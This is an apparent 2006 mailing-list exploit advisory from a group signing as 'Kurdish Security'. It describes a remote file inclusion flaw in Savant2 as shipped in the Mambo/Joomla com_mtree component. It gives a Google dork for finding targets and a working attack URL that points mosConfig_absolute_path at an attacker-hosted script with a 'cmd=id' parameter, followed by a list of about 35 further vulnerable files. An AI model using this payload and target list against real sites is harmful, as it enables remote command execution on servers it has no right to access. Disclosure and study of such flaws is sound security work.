[Kurdish Security # 13] Savant2 Remote File Include Vulnerability
Date: 21 Jul 2006 16:18:12 -0000
From: [email protected]
To: [email protected]
Subject: [Kurdish Security # 13] Savant2 Remote File Include Vulnerability
[For Mambo, Joomla]
X-Virus-Scanned: antivirus-gw at tyumen.ru
>>> Kurdish Security
>>> Savant2 Remote File Include Vulnerability
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhac % www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : Savant2
>>> Site : www.phpsavant.com
>>> Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends
d0rkiz : "com_mtree"
----------------------------------------------------------------------------------
/**
* Base plugin class.
*/
global $mosConfig_absolute_path;
require_once $mosConfig_absolute_path.'/components/com_mtree/Savant2/Plugin.php';
/**
For mambo and joomla
http://www.site.com/[mam_jom_path]/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?&cmd=id
used link :]
Savant2_Compiler_basic.php
Savant2_Error_pear.php
Savant2_Error_stack.php
Savant2_Filter_colorizeCode.php
Savant2_Filter_trimwhitespace.php
Savant2_Plugin_ahref.php
Savant2_Plugin_ahrefcontact.php
Savant2_Plugin_ahreflisting.php
Savant2_Plugin_ahreflistingimage.php
Savant2_Plugin_ahrefmap.php
Savant2_Plugin_ahrefownerlisting.php
Savant2_Plugin_ahrefprint.php
Savant2_Plugin_ahrefrating.php
Savant2_Plugin_ahrefrecommend.php
Savant2_Plugin_ahrefreport.php
Savant2_Plugin_ahrefreview.php
Savant2_Plugin_ahrefvisit.php
Savant2_Plugin_checkbox.php
Savant2_Plugin_cycle.php
Savant2_Plugin_dateformat.php
Savant2_Plugin_editor.php
Savant2_Plugin_form.php
Savant2_Plugin_image.php
Savant2_Plugin_input.php
Savant2_Plugin_javascript.php
Savant2_Plugin_listalpha.php
Savant2_Plugin_listingname.php
Savant2_Plugin_modify.php
Savant2_Plugin_mtpath.php
Savant2_Plugin_options.php
Savant2_Plugin_radios.php
Savant2_Plugin_rating.php
Savant2_Plugin_stylesheet.php
Savant2_Plugin_textarea.php